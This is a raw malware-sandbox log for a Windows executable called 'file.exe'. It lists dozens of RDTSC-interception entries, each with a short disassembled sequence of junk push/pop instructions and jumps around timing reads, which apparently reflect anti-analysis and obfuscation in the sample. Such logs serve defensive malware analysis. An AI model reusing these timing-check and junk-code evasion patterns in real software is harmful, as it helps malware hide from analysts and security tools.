Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91C5FB second address: 91C601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91C8CD second address: 91C8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503872h 0x00000011 jl 00007F8481503866h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91CA31 second address: 91CA4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743935h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91CA4C second address: 91CA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91CCC9 second address: 91CCCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91CCCD second address: 91CCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91D11D second address: 91D130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F8480743926h 0x0000000d jno 00007F8480743926h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C9783 second address: 8C9787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91D773 second address: 91D777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91D777 second address: 91D792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F848150386Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91D792 second address: 91D7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848074392Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924375 second address: 92437F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92437F second address: 924389 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924389 second address: 924394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 894CAB second address: 894CC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F848074392Ch 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92332B second address: 923341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503872h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92360B second address: 923626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480743937h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923761 second address: 923765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923A35 second address: 923A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923A3B second address: 923A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503875h 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923A5A second address: 923A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8480743938h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8480743931h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923A8E second address: 923AA3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8481503868h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jbe 00007F8481503866h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923AA3 second address: 923AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923C10 second address: 923C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923C14 second address: 923C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743937h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923DBB second address: 923DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F848150386Fh 0x00000008 jl 00007F8481503866h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923DD7 second address: 923DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923DDF second address: 923DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923DE5 second address: 923DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278BE second address: 9278C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278C2 second address: 9278C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278C6 second address: 9278D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278D0 second address: 9278D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278D4 second address: 9278F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jo 00007F848150387Ah 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007F8481503866h 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF3E second address: 92AF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF47 second address: 92AF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF4D second address: 92AF62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jno 00007F8480743926h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF62 second address: 92AF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF66 second address: 92AF6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF6C second address: 92AF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E276B second address: 8E279E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8480743934h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2C1E second address: 8E2C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2C24 second address: 8E2C9E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ebx 0x00000015 jmp 00007F8480743935h 0x0000001a pop ebx 0x0000001b pop eax 0x0000001c mov cx, si 0x0000001f pushad 0x00000020 jmp 00007F848074392Eh 0x00000025 mov si, cx 0x00000028 popad 0x00000029 call 00007F8480743929h 0x0000002e jmp 00007F8480743938h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F8480743934h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2C9E second address: 8E2CA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2CA3 second address: 8E2CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnp 00007F8480743933h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F8480743935h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2D75 second address: 8E2D8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E30A8 second address: 8E30B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jnp 00007F8480743934h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E30B9 second address: 8E3102 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F848150386Ah 0x00000010 push 00000004h 0x00000012 jmp 00007F8481503876h 0x00000017 push eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8481503878h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3102 second address: 8E3106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3575 second address: 8E357A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E389B second address: 8E389F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3A06 second address: 8E3A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3A0A second address: 8E3A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3A1B second address: 8C9783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8481503876h 0x0000000c jc 00007F8481503866h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 sub cx, 1441h 0x0000001a call dword ptr [ebp+122D20AFh] 0x00000020 pushad 0x00000021 jns 00007F8481503868h 0x00000027 push edi 0x00000028 jbe 00007F8481503866h 0x0000002e pop edi 0x0000002f popad 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F848150386Dh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B214 second address: 92B23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848074392Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 jbe 00007F848074392Eh 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B23B second address: 92B23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B6B7 second address: 92B6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B6BD second address: 92B6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B6C3 second address: 92B6D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Bh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B829 second address: 92B82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B82D second address: 92B831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B831 second address: 92B839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B839 second address: 92B881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jg 00007F8480743926h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F8480743934h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e pushad 0x0000001f jmp 00007F8480743938h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B881 second address: 92B88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B88A second address: 92B88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCA1 second address: 92BCA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCA5 second address: 92BCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCAB second address: 92BCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCB1 second address: 92BCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCB7 second address: 92BCBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCBB second address: 92BCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F848074392Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92F308 second address: 92F311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EBC6 second address: 92EBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EE8A second address: 92EE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EE94 second address: 92EE98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EFE1 second address: 92F009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007F848150386Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8481503871h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92F009 second address: 92F00F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92F00F second address: 92F022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F848150386Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92F022 second address: 92F02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F8480743932h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9314E4 second address: 9314E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9314E9 second address: 931507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743938h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931507 second address: 931512 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 932F8C second address: 932F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 936EF5 second address: 936F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F848150386Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 937172 second address: 937176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93776D second address: 937775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 937775 second address: 93779A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F8480743939h 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93779A second address: 9377A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9377A0 second address: 9377A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C3E7 second address: 93C3FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F8481503866h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C547 second address: 93C551 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C551 second address: 93C559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C559 second address: 93C55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C6DD second address: 93C6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C6E1 second address: 93C6E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C9AC second address: 93C9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C9B0 second address: 93C9BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CB25 second address: 93CB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503878h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CB47 second address: 93CB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F8480743940h 0x0000000b popad 0x0000000c jc 00007F848074393Eh 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
